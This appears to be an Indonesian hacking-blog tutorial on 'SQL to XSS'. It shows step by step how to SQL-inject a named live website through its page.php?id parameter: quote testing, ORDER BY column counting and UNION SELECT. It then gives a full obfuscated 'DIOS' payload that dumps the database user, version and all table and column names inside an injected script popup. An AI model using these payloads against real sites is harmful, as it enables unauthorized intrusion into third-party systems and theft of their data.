Tutorial sql to xss

 

Halo sobat GhostCodersTeam! 

Gw isnan kali ini gw akan mengajarkan kalian cara melakukan sql to xss sebelumya udah gw beri tau pengertian dri sql dan xss di blog kami jika kalian blom tau dari pengertian sql to xss silahkan cari saja artiker yg tersedia di blog kami

Ok kita langsung aja ke bahan² nya

- dios sql to xss

- untuk live target nya silahkan kalian Klik disini

- internet pastinya:v

Ok kita lansung aja ke tutorial nya 

- Kalian klik saja web nya maka tampilan awal nya akan seperti ini

- lalu tinggal kita tambahkan petik(') saja di belakang angka 2 untuk mengetahui vuln atau tidak 

Contoh:

http://www.hsaco.in/page.php?id=2'

- Jika vuln maka tampilan nya seperti itu lalu kita lanjut ke order by nya 

Contoh: http://www.hsaco.in/page.php?id=2%27+order+by+1--+-

-Maka akan seperti itu tampilannya & kita liat web nya tidak eror di angka 1 lalu kita naikin saja angkanya sampai eror

http://www.hsaco.in/page.php?id=2%27+order+by+2--+- (tidak eror)

http://www.hsaco.in/page.php?id=2%27+order+by+3--+- (tidak eror)

http://www.hsaco.in/page.php?id=2%27+order+by+4--+- (tidak eror)

http://www.hsaco.in/page.php?id=2%27+order+by+5--+- (tidak eror)

http://www.hsaco.in/page.php?id=2%27+order+by+6--+- (eror)

- Nah web nya eror di angka 6 lalu kita tinggal mencari angka togel nya dengan menggunakan union select 

Contoh: http://www.hsaco.in/page.php?id=-2%27+union+select+1,2,3,4,5--+-

Sampai angka 5 saja karna di angka 6 eror dan jangan lupa tambahkan min (-) di depan param atau angka 2 maka disitu akan muncul angka togel nya seperti ini 

Bisa kita liat disitu telah muncul angka togel nya lalu kita hapus aja angka 4 nya dan di ganti dengan dios sql to xss 

Dios yg saya gunakan:

CoNcAt/**/(0x3c7363726970743e70726f6d70742822,

'Xnanz',0x7c7c,user/**/(),0x7c7c,version(),0x7c7c,database/**8**/(),0x7c7c,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x7c7c,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e)

Maka hasilnya:

http://www.hsaco.in/page.php?id=2'+union+select+1,2,3,CoNcAt/**/(0x3c7363726970743e70726f6d70742822,'Xnanz',0x7c7c,user/**/(),0x7c7c,version(),0x7c7c,database/**8**/(),0x7c7c,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x7c7c,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e),5--+-

Dan yups kita berhasil melakukan sql to xss nya 

Bila masih ada pertanyaan yg tidak paham silahkan kalian klik saja pojok kanan paling bawah untuk menanyakan sesuatu hal yg blom kalian pahami tentang ini 

Chat bot by coderider

See the Pen Chat bot by GhostCodersTeam (@GhostCodersTeam) on CodePen.